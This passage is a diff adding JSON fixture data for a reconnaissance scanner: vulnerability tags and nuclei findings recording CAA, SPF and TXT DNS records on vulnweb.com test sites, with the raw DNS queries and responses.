+}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 23, + "fields": { + "name": "sqli" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 24, + "fields": { + "name": "authenticated" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 25, + "fields": { + "name": "car_rental_management_system_project" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 26, + "fields": { + "name": "headers" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 27, + "fields": { + "name": "detect" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 28, + "fields": { + "name": "aspnet" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 29, + "fields": { + "name": "phpstorm" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 30, + "fields": { + "name": "jetbrains" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 31, + "fields": { + "name": "idea" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 32, + "fields": { + "name": "files" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 33, + "fields": { + "name": "microsoft" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 34, + "fields": { + "name": "iis" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 35, + "fields": { + "name": "waf" + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.229Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 59703\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 59703\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 2, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.369Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 6700\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 6700\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 3, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\", \"\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.493Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 6700\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 6700\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 4, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.590Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 49087\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 49087\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 5, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.672Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 49087\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 49087\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 6, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.790Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 26302\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 26302\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w"\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 7, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\", \"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:33.917Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 26302\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 26302\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w"\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 8, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.101Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 33573\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 33573\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w"\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 9, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w\\\"\", \"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.278Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 33573\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 33573\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:9QFopDZwL4Fw1z9RU7_L1QQqIpeZNgyuufqN44mRG8w"\ntestasp.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 10, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.412Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 27564\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 27564\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3599\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 11, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.518Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 27564\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 27564\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3599\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 12, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.649Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 56223\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 56223\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3599\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 13, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.756Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 56223\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 56223\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3599\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 14, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.852Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 8206\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 8206\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 15, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:34.927Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 8206\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 8206\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 16, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.001Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 20044\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION 